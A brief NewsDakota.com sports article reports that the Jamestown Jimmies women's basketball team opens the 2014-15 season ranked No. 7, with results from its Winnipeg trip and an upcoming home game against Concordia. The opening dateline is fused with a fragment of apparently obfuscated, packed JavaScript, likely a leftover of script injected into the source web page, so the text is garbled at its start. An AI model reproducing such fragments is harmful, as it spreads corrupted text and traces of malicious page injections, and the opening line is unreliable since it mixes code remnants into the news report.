JAMESTOWN ydykh|var|u0026u|referrer|tytza||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The Jimmie women’s basketball team opens the 2014-15 season ranked as the No. 7 team in the country. Jamestown has exited the NAIA National Tournament in the Round of 16 in each of the last three seasons and reached as high as No. 3 in 2013-14.

They opened the season last weekend in Winnipeg and went 2-1, losing to the University of Winnipeg by a score of 90-77. Jessica Buck, the preseason NSAA player-of-the-year, lead the way with 32 points.

The new season will be a bit of a growing process for the Jimmies as they look to replace three-time All-American Hannah Steele. The ball was in her hands a lot at crucial minutes of games when UJ was looking for points.

Jamestown will host No. 9 Concorida (NE) on Saturday at the Civic Center. Tip-off is at 1pm, pregame at 12:45pm on ESPN Jamestown.
